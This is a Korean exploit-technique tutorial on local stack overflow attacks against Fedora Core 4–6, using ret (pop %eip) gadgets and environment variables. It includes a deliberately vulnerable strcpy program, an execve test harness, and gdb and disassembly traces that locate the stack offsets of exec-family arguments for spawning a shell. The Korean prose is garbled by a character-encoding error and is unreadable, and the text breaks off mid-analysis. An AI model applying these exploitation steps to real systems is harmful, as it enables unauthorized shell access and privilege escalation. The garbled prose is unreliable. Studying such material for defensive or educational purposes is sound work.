------------------------------------------------------------------------------------------------------ Á¦¸ñ: Fedora Core 4,5,6 ³»¿¡¼­ local ½ºÅà ±â¹Ý overflow exploit ¹æ¹ý #2 (Fedora Core 4,5,6 based local environment stack overflow exploit method) ºÎÁ¦: ret(pop %eip) ÄÚµå¿Í ȯ°æ º¯¼ö¸¦ ÀÌ¿ëÇÑ local °ø°Ý ±â¹ý Å×½ºÆ® ȯ°æ: Fedora Core release 4 (Stentz) Linux 2.6.11-1.1369_FC4 #1 Thu Jun 2 22:55:56 EDT 2005 Fedora Core release 5 (Bordeaux) Linux 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 Fedora Core release 6 (Zod) Linux 2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:54:20 EDT 2006 ÀÛ¼ºÀÚ: À¯µ¿ÈÆ - Xpl017Elz http://x82.inetcop.org ------------------------------------------------------------------------------------------------------ 0) °ø°Ý ±â¹ýÀ» ¼Ò°³Çϱâ Àü¿¡, ¿ì¼± Àâ´ãºÎÅÍ~ POC 2006 ÄÁÆÛ·±½º¶§ ½Ã°£ »ó »ý·«Çß´ø local buffer overflow °ø°Ý ±â¹ýÀ» Ãß°¡·Î ¼³¸íÇϵµ·Ï ÇÏ°Ú´Ù. ÀÌ °ø°Ý ±â¹ýÀº "Fedora Core 4,5,6 ³»¿¡¼­ local ½ºÅà ±â¹Ý overflow exploit ¹æ¹ý" ¹®¼­¿¡¼­ ¼Ò°³ÇÏ°í ÀÖ´Â ret(pop %eip) °ø°Ý ±â¹ýÀ» ±â¹ÝÀ¸·Î ÇÏ°í ÀÖ´Ù. ÇØ´ç ±â¹ýÀ» ¸ð¸£°í ÀÖ´Ù¸é, ret(pop %eip) Äڵ带 ÀÌ¿ëÇÑ °ø°Ý ±â¹ýÀ» ¸ÕÀú ÀÍÈù ÈÄ ÀоîÁÖ±æ ¹Ù¶õ´Ù. ÀÌ ¹æ¹ýÀÌ ½ÇÁ¦ exploit ½Ã, ¾ó¸¶³ª È°¿ëµµ°¡ ÀÖÀ»Áø ¹ÌÁö¼öÀÌ´Ù. ±×·¡¼­, ³ª´Â POC 2006 ÄÁÆÛ·±½º¿¡¼­ °ú°¨È÷ ÀÌ ºÎºÐÀ» »ý·«Çß´Ù. »ç½Ç, »ý·«À̶ó±â º¸´Ù´Â ¹ßÇ¥ ½Ã°£À» °í·ÁÇÏ¿© ÁغñÇÏÁö ¾ÊÀº °ÍÀÌ´Ù. ´Ê°Ô³ª¸¶ ÀÌ·¸°Ô °ø°Ý ±â¹ý¿¡ ´ëÇÑ ¹®¼­¸¦ Á¤¸®ÇÒ ¼ö À־ ´ÙÇàÀ̶ó »ý°¢ÇÑ´Ù. ÀÌ idea´Â ³»°¡ ¿¹Àü¿¡ man local exploitÀ» ÀÛ¼ºÇÒ ¶§ °³¹ßÇß´ø °ÍÀ¸·Î, ¸î °¡Áö test code¸¦ ´ë»óÀ¸·Î ½ÃÇèÇغ» °á°ú, ret(pop %eip) Äڵ带 ¸¹ÀÌ ÀÔ·ÂÇÒ ¼ö ÀÖ´Â Á¶°Ç ÇÏ¿¡ ½Ãµµ °¡´ÉÇÑ °ø°Ý ±â¹ýÀÌ´Ù. ±×·³, ¿Ö ½ÇÁ¦ exploit ½Ã È°¿ëµµ°¡ ¶³¾îÁö´Â °ÍÀϱî? ±× ÀÌÀ¯´Â ½ÇÁ¦ applicationÀÇ °ø°Ý ´ë»ó Áö¿ª º¯¼ö°¡ argument Æ÷ÀÎÅÍ, ȯ°æ º¯¼ö Æ÷ÀÎÅ͵é°ú °¡±îÀÌ ÀÖÁö ¾Ê±â ¶§¹®ÀÌ´Ù. Áï, ´Ù½Ã ¸»ÇÏÀÚ¸é argument Æ÷ÀÎÅÍ, ȯ°æ º¯¼ö Æ÷ÀÎÅ͵é°ú °Å¸®°¡ ¸Õ ÇÁ·¹ÀÓ ³»ÀÇ Ãë¾àÁ¡ ¹ß»ý·üÀÌ ´õ ³ô±â ¶§¹®ÀÌ´Ù. ¾î¶² ÇÁ·Î±×·¡¸Ó°¡ ÀÚ½ÅÀÇ ÇÁ·Î±×·¥ main() ÇÔ¼ö ³»¿¡¼­ stack overflow°¡ ¹ß»ýÇÏ´Â °ÍÀ» ¹æ°üÇϰڴ°¡? ¶ÇÇÑ, stack¿¡ ÇÒ´çµÇ´Â °¢ ÇÁ·¹ÀÓÀÇ Å©±âµµ ÀÏ¹Ý test codeº¸´Ù ÈξÀ ´õ Å« size¸¦ °®´Â´Ù. ±Ô¸ð°¡ ÀÖ´Â ÇÁ·ÎÁ§Æ®ÀÇ application À̶ó¸é, stack¿¡ ÇÒ´çµÈ Áö¿ª º¯¼öµéÀÌ ¸¹Àº °ÍÀº ´õ¿í ´ç¿¬ÇÒ °ÍÀÌ´Ù. ¿ì¸®´Â ÇÁ·Î±×·¥ ½ÇÇà ÆÄÀÏ ÀÎÀÚ¿Í °ü·ÃµÈ %esp ·¹Áö½ºÅ͸¦ Á÷Á¢ ¿Å±âÁö ¸øÇϱ⠶§¹®¿¡, ret(pop %eip)¿Í °°Àº Äڵ带 ÀÌ¿ëÇÏ¿© 4byte ¾¿ À̵¿ÇÒ ¼ö ¹Û¿¡ ¾ø´Ù. ÀÌ ¶§¹®¿¡ ÇöÀç »ç¿ë ÁßÀÎ stack°ú argument, ȯ°æ º¯¼ö Æ÷ÀÎÅÍ¿ÍÀÇ °Å¸®°¡ ¸Ö´Ù¸é, »ç½Ç »óÀÇ °ø°ÝÀº Èûµé´Ù°í ÆÇ´ÜÇØ¾ß ÇÑ´Ù. ½ÇÁ¦ applicationÀ» °ø°ÝÇÒ ¶§´Â ÀÌÀü¿¡ ¼Ò°³Çß´ø symlink ¹æ½Ä ÀÌ¿ëÀ» ±ÇÀåÇÏ´Â ¹ÙÀÌ´Ù. 1) ret(pop %eip) ÄÚµå¿Í ȯ°æ º¯¼ö¸¦ ÀÌ¿ëÇÑ local °ø°Ý ÀÌ·Ð ÇÏÁö¸¸, ¾Õ¼­ ¼³¸íÇß´ø °æ¿ì¿Í ´Ù¸£°Ô argument Æ÷ÀÎÅÍ, ȯ°æ º¯¼ö Æ÷ÀÎÅÍ¿Í ¸Å¿ì °¡±îÀÌ ÀÖ´Â ÇÁ·¹ÀÓ ³»ÀÇ Áö¿ª º¯¼ö¿¡¼­ Ãë¾àÁ¡ÀÌ ¹ß»ýÇÑ´Ù¸é À̾߱â´Â ´Þ¶óÁø´Ù. ÀÌ·± °æ¿ì¿¡´Â ret(pop %eip) Äڵ带 ÅëÇØ 4byte¾¿ À̵¿ÇÏ¿© ȯ°æ º¯¼ö Æ÷ÀÎÅÍ°¡ ÀÖ´Â À§Ä¡±îÁö %esp ·¹Áö½ºÅ͸¦ ¿Å±æ ¼ö ÀÖ´Ù. ÀÌÀü¿¡ ¼³¸íÇÏ¿´´ø ret(pop %eip) ÄÚµå symlink Á¶ÇÕ °ø°ÝÀº stack¿¡ ÀÖ´Â °ªµéÀ» ±×´ë·Î È°¿ëÇÏ´Â ¹æ¹ýÀ̾úÁö¸¸, À̹ø °ø°ÝÀº exec °è¿­ ÇÔ¼öÀÇ ÀÎÀÚ °ªÀ» ȯ°æ º¯¼ö¸¦ ÅëÇØ Á÷Á¢ Á¤ÇØÁÖ´Â ¹æ¹ýÀ̶ó ÇÒ ¼ö ÀÖ´Ù. °ø°ÝÀÇ ¿Ï¼ºµµ·Î µûÁöÀÚ¸é, À̹ø¿¡ ¼Ò°³ÇÏ´Â ¹æ½ÄÀÌ ÇѼö À§ÀÇ °ø°Ý ±â¹ýÀÌÁö¸¸, ½ÇÁ¦ applicationÀ» °ø°ÝÇϴµ¥ È°¿ëµÇ¾ú´Ù¸é ´õ ÁÁÁö ¾Ê¾ÒÀ»±î ¾Æ½¬¿òÀÌ ³²´Â´Ù. ±×·³, ¸ÕÀú argument Æ÷ÀÎÅÍ¿Í È¯°æ º¯¼ö Æ÷ÀÎÅÍ ±¸Á¶¿¡ ´ëÇØ ¾Ë¾Æº¸µµ·Ï ÇÏ°Ú´Ù. 2) argument Æ÷ÀÎÅÍ, ȯ°æ º¯¼ö Æ÷ÀÎÅÍ ºÐ¼® argument Æ÷ÀÎÅÍ¿Í È¯°æ º¯¼ö Æ÷ÀÎÅÍ´Â °¢ µ¥ÀÌÅ͸¦ °¡¸®Å°´Â Æ÷ÀÎÅÍ°¡ ¹Ýº¹µÈ ¹è¿­ ÇüÅ·Π±¸¼ºµÇ¾î ÀÖ´Ù. ÀÌ·¯ÇÑ argument Æ÷ÀÎÅÍ, ȯ°æ º¯¼ö Æ÷ÀÎÅÍÀÇ ³¡¿¡´Â Ç×»ó null(0x00000000)À» ºÙÀ¸¸ç, À̸¦ ÅëÇØ ¹è¿­ÀÇ ³¡ÀÎÁö ±¸ºÐÇÑ´Ù. Ãß»óÀûÀ¸·Î µµ½ÄÈ­ÇÑ ¸ð¾çÀº ´ÙÀ½°ú °°´Ù. ------------------------------------------------------------------------------------------------------ ^ | ½ºÅÃÀÌ Ä¿Áö´Â ¹æÇâ ... +---------------------+ | argument0 pointer |: argument ½ÃÀÛ. +---------------------+ | argument1 pointer | +---------------------+ | null (0x00000000) |: argument ³¡. +---------------------+ | environ0 pointer |: environment ½ÃÀÛ. +---------------------+ | environ1 pointer | +---------------------+ | null (0x00000000) |: environment ³¡. +---------------------+ ... | ÁÖ¼Ò°¡ Ä¿Áö´Â ¹æÇâ V ------------------------------------------------------------------------------------------------------ À§ÀÇ °æ¿ì, »ç¿ëµÈ argumnent´Â µÎ °³À̸ç, µÎ °³ÀÇ È¯°æ º¯¼ö°¡ ÀÔ·ÂµÈ °ÍÀ» º¼ ¼ö ÀÖ´Ù. ½ÇÁ¦ ´ÙÀ½°ú °°ÀÌ ±¸¼ºµÇ¾î ÀÖ´Ù. ------------------------------------------------------------------------------------------------------ [root@localhost exec]# cat vuln.c int main(int argc,char *argv[]) { char buf[8]; strcpy(buf,argv[1]); // Ãë¾à } [root@localhost exec]# cat test.c int main() { char *environ[]={ "environ0", "environ1", 0}; char *argument[]={ "argument0", "argument1argument1", // Àӽà debuggingÀ» À§ÇØ 0}; execve("./vuln",argument,environ); } [root@localhost exec]# gcc -o test test.c [root@localhost exec]# gdb -q test ... (gdb) r Starting program: /home/x82/test (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x6e656d75 in ?? () (gdb) x/6x $esp+132 0xfef9b334: 0xfefcdfc6 0xfefcdfd0 0x00000000 0xfefcdfe3 0xfef9b344: 0xfefcdfec 0x00000000 (gdb) x/s 0xfefcdfc6 0xfefcdfc6: "argument0" <=== ù ¹ø° argument (¿ø·¡´Â ½ÇÇàÇÏ´Â ÇÁ·Î±×·¥ °æ·Î) (gdb) x/s 0xfefcdfd0 0xfefcdfd0: "argument1argument1" <=== µÎ ¹ø° argument (gdb) x/s 0xfefcdfe3 0xfefcdfe3: "environ0" <=== ù ¹ø° ȯ°æ º¯¼ö (gdb) x/s 0xfefcdfec 0xfefcdfec: "environ1" <=== µÎ ¹ø° ȯ°æ º¯¼ö (gdb) ------------------------------------------------------------------------------------------------------ ÀÓÀÇ·Î argument µÎ °³¿Í ȯ°æ º¯¼ö µÎ °³¸¦ ¸¸µé¾î º¸¾Ò´Ù. ¾Õ¼­ ¼³¸íÇß´øµ¥·Î, °¢ Æ÷ÀÎÅÍ ¹è¿­ µÚ¿¡´Â null(0x00000000)ÀÌ ºÙ´Â °ÍÀ» º¼ ¼ö ÀÖ´Ù. ±×·³ À̹ø¿¡´Â, exec °è¿­ ÇÔ¼öµéÀ» ºÐ¼®Çغ¸µµ·Ï ÇÏ°Ú´Ù. Áö±ÝºÎÅÍ exec °è¿­ ÇÔ¼öµéÀÌ ÇÁ·Î±×·¥ ÀÎÀÚ¸¦ ¾î¶»°Ô Çڵ鸵ÇÏ´ÂÁö ÀÚ¼¼È÷ ºÐ¼®ÇÏ±æ ¹Ù¶õ´Ù. 3) exec °è¿­ ÇÔ¼ö ºÐ¼® ±×·³, Áö±ÝºÎÅÍ man page¿¡ ³ª¿À´Â ¼ø¼­´ë·Î exec °è¿­ ÇÔ¼ö(Àϸí exec family¶ó ºÎ¸§)µéÀ» ºÐ¼®Çغ¸µµ·Ï ÇÏ°Ú´Ù. (Âü°í·Î, ºÐ¼®Àº Fedora core 4 ½Ã½ºÅÛ¿¡¼­ ½ÃÇè ÇßÀ½À» ¹àÈù´Ù.) ------------------------------------------------------------------------------------------------------ NAME execl, execlp, execle, execv, execvp - execute a file SYNOPSIS #include extern char **environ; int execl(const char *path, const char *arg, ...); - ÀÎÀÚ 3°³ ÇÊ¿ä int execlp(const char *file, const char *arg, ...); - ÀÎÀÚ 3°³ ÇÊ¿ä int execle(const char *path, const char *arg , ..., char * const envp[]); - ÀÎÀÚ 3°³ ÀÌ»ó ÇÊ¿ä int execv(const char *path, char *const argv[]); - ÀÎÀÚ 2°³ ÇÊ¿ä int execvp(const char *file, char *const argv[]); - ÀÎÀÚ 2°³ ÇÊ¿ä ... int execve(const char *filename, char *const argv [], char *const envp[]); - ÀÎÀÚ 3°³ ÇÊ¿ä exec °è¿­ ÇÔ¼ö¿¡ ºÙ´Â ¶æ Çؼ®: l: ÀÎÀÚ¸¦ list ÇüÅ·ΠÀü´Þ. v: ÀÎÀÚ¸¦ vector ÇüÅ·ΠÀü´Þ. (¹è¿­ ÇüÅÂ) e: ȯ°æ º¯¼ö¸¦ Àü´Þ. p: ½ÇÇà ÆÄÀÏÀÇ °æ·Î¸¦ PATH º¯¼ö¿¡¼­ ÂüÁ¶ÇÏ¿© ½ÇÇà ------------------------------------------------------------------------------------------------------ ºÐ¼® °á°ú Áß, ÁÖÀDZí°Ô °üÂûÇØ¾ß ÇÒ °ÍÀº, %esp ·¹Áö½ºÅ͸¦ ±âÁØÀ¸·ÎÇÑ exec °è¿­ ÇÔ¼öÀÇ ¸í·É À§Ä¡ÀÌ´Ù. debug ºÐ¼® °á°ú¸¦ Åä´ë·Î, exploitÀ» ÀÛ¼ºÇÒ °ÍÀÌ´Ï Àß »ìÆ캸±æ ¹Ù¶õ´Ù. 3-1) execl() ¶óÀ̺귯¸® ÇÔ¼ö ºÐ¼® execl() ÇÔ¼ö´Â ÀÎÀÚ¸¦ list ÇüÅ·ΠÀü´ÞÇÏ´Â ¶óÀ̺귯¸® Á¦°ø ÇÔ¼öÀÌ´Ù. ½ÇÁ¦ execl() ÇÔ¼ö ³»ºÎ¿¡¼­´Â execve() ÇÔ¼ö¸¦ È£ÃâÇÏ°í ÀÖÀ¸¸ç, execl() ÇÔ¼ö ÁøÀÔ Á÷ÈÄ, %esp+4, execve() ÁøÀÔ Á÷Àü, %esp+0x1030 À§Ä¡¸¦ ÂüÁ¶ÇÏ¿© execve() ÇÔ¼öÀÇ Ã¹ ¹ø° ¸í·É ÀÎÀÚ¸¦ ¾ò¾î¿Â´Ù. ¿¹Á¦ ÄÚµå: execl("/bin/sh","sh",0); ¶Ç´Â, execl("/bin/sh","sh","-c","ls",0); ----------------------------------------------------------------------------------------------------- execl() ÇÔ¼ö ÁøÀÔ Á÷ÈÄ, %esp+4 À§Ä¡ºÎÅÍ Ã¹ ¹ø° ÀÎÀÚ°¡ µé¾î°¨. ÇÔ¼ö ÇÁ·Ñ·Î±×°¡ Áö³­ ÈÄ, ~~~~~~~~~~~ 0x007a245c : push %ebp 0x007a245d : push %edi 0x007a245e : push %esi 0x007a245f : push %ebx 0x007a2460 : sub $0x101c,%esp ÀÌ ÁöÁ¡À¸·Î ¿À¸é, %esp+0x1030 À§Ä¡¿¡ ¾Õ¼­ ¼³¸íÇÑ Ã¹ ¹ø° ÀÎÀÚ °ªÀÌ µé¾îÀÖÀ½. ~~~~~~~~~~~~~~~~ 0x007a2525 : mov 0xfffffec0(%ebx),%eax 0x007a252b : mov (%eax),%eax 0x007a252d : mov %eax,0x8(%esp) <=== execve() ÇÔ¼ö ¼¼ ¹ø° ÀÎÀÚ 0x007a2531 : mov 0x14(%esp),%eax 0x007a2535 : mov %eax,0x4(%esp) <=== execve() ÇÔ¼ö µÎ ¹ø° ÀÎÀÚ 0x007a2539 : mov 0x1030(%esp),%eax 0x007a2540 : mov %eax,(%esp) <=== execve() ÇÔ¼ö ù ¹ø° ÀÎÀÚ 0x007a2543 : call 0x7a21ac ... Breakpoint 1, 0x0019e45c in execl () from /lib/libc.so.6 (gdb) x $esp <=== execl()+0 ÁøÀÔ Á÷ÈÄ stack pointer 0xbf83b63c: 0x080483ac (gdb) 0xbf83b640: 0x0804845b <=== execl() ÇÔ¼ö ù ¹ø° ÀÎÀÚ (%esp+4 À§Ä¡) (gdb) 0xbf83b644: 0x08048458 <=== execl() ÇÔ¼ö µÎ ¹ø° ÀÎÀÚ (%esp+8 À§Ä¡) (gdb) 0xbf83b648: 0x00000000 <=== execl() ÇÔ¼ö ¼¼ ¹ø° ÀÎÀÚ (%esp+12 À§Ä¡) (gdb) c Continuing. Breakpoint 2, 0x0019e466 in execl () from /lib/libc.so.6 (gdb) x/x $esp+0x1030 <=== execve() ÇÔ¼ö¸¦ ºÎ¸£±â Á÷Àü stack pointer 0xbf83b640: 0x0804845b <=== execl() ÇÔ¼ö ù ¹ø° ÀÎÀÚ (gdb) 0xbf83b644: 0x08048458 <=== execl() ÇÔ¼ö µÎ ¹ø° ÀÎÀÚ (gdb) 0xbf83b648: 0x00000000 <=== execl() ÇÔ¼ö ¼¼ ¹ø° ÀÎÀÚ (gdb) ------------------------------------------------------------------------------------------------------ 3-2) execle() ¶óÀ̺귯¸® ÇÔ¼ö ºÐ¼® execle() ÇÔ¼ö´Â ȯ°æ º¯¼ö¿Í ÇÔ²² ÀÎÀÚ¸¦ list ÇüÅ·ΠÀü´ÞÇÏ´Â ¶óÀ̺귯¸® Á¦°ø ÇÔ¼öÀÌ´Ù. ½ÇÁ¦ execle() ÇÔ¼ö ³»ºÎ¿¡¼­´Â execve() ÇÔ¼ö¸¦ È£ÃâÇÏ°í ÀÖÀ¸¸ç, execle() ÇÔ¼ö ÁøÀÔ Á÷ÈÄ, %esp+4, execve() ÁøÀÔ Á÷Àü, %esp+0x1030 À§Ä¡¸¦ ÂüÁ¶ÇÏ¿© execve() ÇÔ¼öÀÇ Ã¹ ¹ø° ¸í·É ÀÎÀÚ¸¦ ¾ò¾î¿Â´Ù. ¿¹Á¦ ÄÚµå: execle("./sh",0,0); ¶Ç´Â, execle("/bin/sh","sh","-c","ls",env); (½ÇÁ¦ exploit ½Ã, argument¸¦ Çڵ鸵 ÇÏÁö ¾Ê´Â sh ÇÁ·Î±×·¥À» ÁغñÇØµÎ¸é ¹®Á¦¾øÀÌ, shellÀ» ½ÇÇàÇÒ ¼ö ÀÖ´Ù.) ------------------------------------------------------------------------------------------------------ execle() ÇÔ¼ö ÁøÀÔ Á÷ÈÄ, %esp+4 À§Ä¡ºÎÅÍ Ã¹ ¹ø° ÀÎÀÚ°¡ µé¾î°¨. ÇÔ¼ö ÇÁ·Ñ·Î±×°¡ Áö³­ ÈÄ, ~~~~~~~~~~~ 0x007a2308 : push %ebp 0x007a2309 : push %edi 0x007a230a : push %esi 0x007a230b : push %ebx 0x007a230c : sub $0x101c,%esp ÀÌ ÁöÁ¡À¸·Î ¿À¸é, %esp+0x1030 À§Ä¡¿¡ ¾Õ¼­ ¼³¸íÇÑ Ã¹ ¹ø° ÀÎÀÚ °ªÀÌ µé¾îÀÖÀ½. ~~~~~~~~~~~~~~~~ 0x007a23d5 : mov 0x1018(%esp),%edx 0x007a23dc : lea 0x4(%edx),%eax 0x007a23df : mov %eax,0x1018(%esp) 0x007a23e6 : mov (%edx),%eax 0x007a23e8 : mov %eax,0x8(%esp) <=== execve() ÇÔ¼ö ¼¼ ¹ø° ÀÎÀÚ 0x007a23ec : mov 0x14(%esp),%eax 0x007a23f0 : mov %eax,0x4(%esp) <=== execve() ÇÔ¼ö µÎ ¹ø° ÀÎÀÚ 0x007a23f4 : mov 0x1030(%esp),%eax 0x007a23fb : mov %eax,(%esp) <=== execve() ÇÔ¼ö ù ¹ø° ÀÎÀÚ 0x007a23fe : call 0x7a21ac ... Breakpoint 8, 0x007a2308 in execle () from /lib/libc.so.6 (gdb) x/x $esp <=== execle()+0 ÁøÀÔ Á÷ÈÄ stack pointer 0xbfccf7dc: 0x080483b6 (gdb) 0xbfccf7e0: 0x08048469 <=== execle() ÇÔ¼ö ù ¹ø° ÀÎÀÚ (%esp+4 À§Ä¡) (gdb) 0xbfccf7e4: 0x00000000 <=== execle() ÇÔ¼ö µÎ ¹ø° ÀÎÀÚ (%esp+8 À§Ä¡) (gdb) 0xbfccf7e8: 0x00000000 <=== execle() ÇÔ¼ö ¼¼ ¹ø° ÀÎÀÚ (%esp+12 À§Ä¡) (gdb) c Continuing. Breakpoint 1, 0x007a23e6 in execle () from /lib/libc.so.6 (gdb) x/x $esp+0x1030 <=== execve() ÇÔ¼ö¸¦ ºÎ¸£±â Á÷Àü stack pointer 0xbfccf7e0: 0x08048469 <=== execle() ÇÔ¼ö ù ¹ø° ÀÎÀÚ (gdb) 0xbfccf7e4: 0x00000000 <=== execle() ÇÔ¼ö µÎ ¹ø° ÀÎÀÚ (gdb) 0xbfccf7e8: 0x00000000 <=== execle() ÇÔ¼ö ¼¼ ¹ø° ÀÎÀÚ (gdb) ------------------------------------------------------------------------------------------------------ 3-3) execlp() ¶óÀ̺귯¸® ÇÔ¼ö ºÐ¼® execlp() ÇÔ¼ö´Â $PATH ȯ°æ º¯¼ö¸¦ ÂüÁ¶Çϸç, ÀÎÀÚ¸¦ list ÇüÅ·ΠÀü´ÞÇÏ´Â ¶óÀ̺귯¸® Á¦°ø ÇÔ¼öÀÌ´Ù. ½ÇÁ¦ execlp() ÇÔ¼ö ³»ºÎ¿¡¼­´Â execvp() ÇÔ¼ö -> execve() ÇÔ¼ö¸¦ È£ÃâÇÏ°í ÀÖÀ¸¸ç, execlp() ÇÔ¼ö ÁøÀÔ Á÷ÈÄ, %esp+4, execvp() ÁøÀÔ Á÷Àü, %esp+0x1030 À§Ä¡¸¦ ÂüÁ¶ÇÏ¿© execvp() ÇÔ¼öÀÇ Ã¹ ¹ø° ¸í·É ÀÎÀÚ¸¦ ¾ò¾î¿Â´Ù. (Âü°í·Î, ½ÇÁ¦ $PATH ȯ°æ º¯¼ö¸¦ ÂüÁ¶ÇÏ´Â °ÍÀº execvp() ÇÔ¼öÀÌ´Ù.) ¿¹Á¦ ÄÚµå: execlp("ls","ls","-al",0); ¶Ç´Â, execlp("sh","sh","-c","ls",0); ------------------------------------------------------------------------------------------------------ execlp() ÇÔ¼ö ÁøÀÔ Á÷ÈÄ, %esp+4 À§Ä¡ºÎÅÍ Ã¹ ¹ø° ÀÎÀÚ°¡ µé¾î°¨. ÇÔ¼ö ÇÁ·Ñ·Î±×°¡ Áö³­ ÈÄ, ~~~~~~~~~~~ 0x007a2978 : push %ebp 0x007a2979 : push %edi 0x007a297a : push %esi 0x007a297b : push %ebx 0x007a297c : sub $0x101c,%esp ÀÌ ÁöÁ¡À¸·Î ¿À¸é, %esp+0x1030 À§Ä¡¿¡ ¾Õ¼­ ¼³¸íÇÑ Ã¹ ¹ø° ÀÎÀÚ °ªÀÌ µé¾îÀÖÀ½. ~~~~~~~~~~~~~~~~ 0x007a2a23 : mov 0x14(%esp),%edx 0x007a2a27 : cmp %edx,0x10(%esp) 0x007a2a2b : je 0x7a2a6b 0x007a2a2d : mov %edi,0x14(%esp) 0x007a2a31 : mov %esi,%ecx 0x007a2a33 : jmp 0x7a29cc 0x007a2a35 : mov %edx,%eax <=== ÀÎÀÚ list ½ÃÀÛ Æ÷ÀÎÅ͸¦ %eax ·¹Áö½ºÅÍ º¹»ç 0x007a2a37 : mov %eax,0x4(%esp) <=== execvp() ÇÔ¼ö µÎ ¹ø° ÀÎÀÚ 0x007a2a3b : mov 0x1030(%esp),%eax 0x007a2a42 : mov %eax,(%esp) <=== execvp() ÇÔ¼ö ù ¹ø° ÀÎÀÚ 0x007a2a45 : call 0x7a25a0 ... Breakpoint 1, 0x0019e978 in execlp () from /lib/libc.so.6 (gdb) x/x $esp <=== execlp()+0 ÁøÀÔ Á÷ÈÄ stack pointer 0xbfecb99c: 0x080483ae (gdb) 0xbfecb9a0: 0x0804845c <=== execlp() ÇÔ¼ö ù ¹ø° ÀÎÀÚ (%esp+4 À§Ä¡): ls (gdb) 0xbfecb9a4: 0x0804845c <=== execlp() ÇÔ¼ö µÎ ¹ø° ÀÎÀÚ (%esp+8 À§Ä¡): ls (gdb) 0xbfecb9a8: 0x08048458 <=== execlp() ÇÔ¼ö ¼¼ ¹ø° ÀÎÀÚ (%esp+12 À§Ä¡): -al (gdb) 0xbfecb9ac: 0x00000000 <=== execlp() ÇÔ¼ö ³× ¹ø° ÀÎÀÚ (%esp+16 À§Ä¡): 0 (gdb) c Continuing. Breakpoint 2, 0x0019ea45 in execlp () from /lib/libc.so.6 (gdb) x/x $esp+0x1030 <=== execve() ÇÔ¼ö¸¦ ºÎ¸£±â Á÷Àü stack pointer 0xbfecb9a0: 0x0804845c <=== execlp() ÇÔ¼ö ù ¹ø° ÀÎÀÚ (gdb) 0xbfecb9a4: 0x0804845c <=== execlp() ÇÔ¼ö µÎ ¹ø° ÀÎÀÚ (gdb) 0xbfecb9a8: 0x08048458 <=== execlp() ÇÔ¼ö ¼¼ ¹ø° ÀÎÀÚ (gdb) 0xbfecb9ac: 0x00000000 <=== execlp() ÇÔ¼ö ³× ¹ø° ÀÎÀÚ (gdb) (gdb) x/x $esp 0xbfeca970: 0x0804845c <=== execvp() ÇÔ¼ö ù ¹ø° ÀÎÀÚ (gdb) 0xbfeca974: 0xbfeca988 <=== execvp() ÇÔ¼ö µÎ ¹ø° ÀÎÀÚ (gdb) ------------------------------------------------------------------------------------------------------ 3-4) execv() ¶óÀ̺귯¸® ÇÔ¼ö ºÐ¼® execv() ÇÔ¼ö´Â ÀÎÀÚ¸¦ ¹è¿­ ÇüÅ·ΠÀü´ÞÇÏ´Â ¶óÀ̺귯¸® Á¦°ø ÇÔ¼öÀÌ´Ù. ½ÇÁ¦ execv() ÇÔ¼ö ³»ºÎ¿¡¼­´Â execve() ÇÔ¼ö¸¦ È£ÃâÇÏ°í ÀÖÀ¸¸ç, execv() ÇÔ¼ö ÁøÀÔ Á÷ÈÄ, %esp+4, execve() ÇÔ¼ö ÁøÀÔ Á÷Àü, %esp+0x14 À§Ä¡¸¦ ÂüÁ¶ÇÏ¿© execve() ÇÔ¼öÀÇ Ã¹ ¹ø° ¸í·É ÀÎÀÚ¸¦ ¾ò¾î¿Â´Ù. ¿¹Á¦ ÄÚµå: execv("./sh",0); ¶Ç´Â, char *args[]={"sh","-c","ls",0}; execv("/bin/sh",args); (½ÇÁ¦ exploit ½Ã, argument¸¦ Çڵ鸵 ÇÏÁö ¾Ê´Â sh ÇÁ·Î±×·¥À» ÁغñÇØµÎ¸é ¹®Á¦¾øÀÌ, shellÀ» ½ÇÇàÇÒ ¼ö ÀÖ´Ù.) ------------------------------------------------------------------------------------------------------ execv() ÇÔ¼ö ÁøÀÔ Á÷ÈÄ, %esp+4 À§Ä¡ºÎÅÍ Ã¹ ¹ø° ÀÎÀÚ°¡ µé¾î°¨. ÇÔ¼ö ÇÁ·Ñ·Î±×°¡ Áö³­ ÈÄ, ~~~~~~~~~~~ 0x007a22d4 : push %ebx 0x007a22d5 : sub $0xc,%esp ÀÌ ÁöÁ¡À¸·Î ¿À¸é, %esp+0x14 À§Ä¡¿¡ ¾Õ¼­ ¼³¸íÇÑ Ã¹ ¹ø° ÀÎÀÚ °ªÀÌ µé¾îÀÖÀ½. ~~~~~~~~~~~~~~ 0x007a22e9 : mov (%eax),%eax 0x007a22eb : mov %eax,0x8(%esp) <=== execve() ÇÔ¼ö ¼¼ ¹ø° ÀÎÀÚ 0x007a22ef : mov 0x18(%esp),%eax 0x007a22f3 : mov %eax,0x4(%esp) <=== execve() ÇÔ¼ö µÎ ¹ø° ÀÎÀÚ 0x007a22f7 : mov 0x14(%esp),%eax 0x007a22fb : mov %eax,(%esp) <=== execve() ÇÔ¼ö ù ¹ø° ÀÎÀÚ 0x007a22fe : call 0x7a21ac ... Breakpoint 8, 0x0019e2d4 in execv () from /lib/libc.so.6 (gdb) x/x $esp <=== execv()+0 ÁøÀÔ Á÷ÈÄ stack pointer 0xbfe26e4c: 0x080483a7 (gdb) 0xbfe26e50: 0x08048450 <=== execv() ÇÔ¼ö ù ¹ø° ÀÎÀÚ (%esp+4 À§Ä¡) (gdb) 0xbfe26e54: 0x00000000 <=== execv() ÇÔ¼ö µÎ ¹ø° ÀÎÀÚ (%esp+8 À§Ä¡) (gdb) c Continuing. Breakpoint 1, 0x0019e2e9 in execv () from /lib/libc.so.6 (gdb) x/x $esp+0x14 <=== execve() ÇÔ¼ö¸¦ ºÎ¸£±â Àü stack pointer 0xbfe26e50: 0x08048450 <=== execv() ÇÔ¼ö ù ¹ø° ÀÎÀÚ (gdb) x/x $esp+0x18 0xbfe26e54: 0x00000000 <=== execv() ÇÔ¼ö µÎ ¹ø° ÀÎÀÚ (gdb) ------------------------------------------------------------------------------------------------------ 3-5) execvp() ¶óÀ̺귯¸® ÇÔ¼ö ºÐ¼® execvp() ÇÔ¼ö´Â ÀÎÀÚ¸¦ ¹è¿­ ÇüÅ·ΠÀü´ÞÇϸ鼭, $PATH ȯ°æ º¯¼ö¸¦ ÂüÁ¶ÇÏ¿© ½ÇÇàÇÏ´Â ¶óÀ̺귯¸® Á¦°ø ÇÔ¼öÀÌ´Ù. ½ÇÁ¦ execvp() ÇÔ¼ö ³»ºÎ¿¡¼­´Â execve() 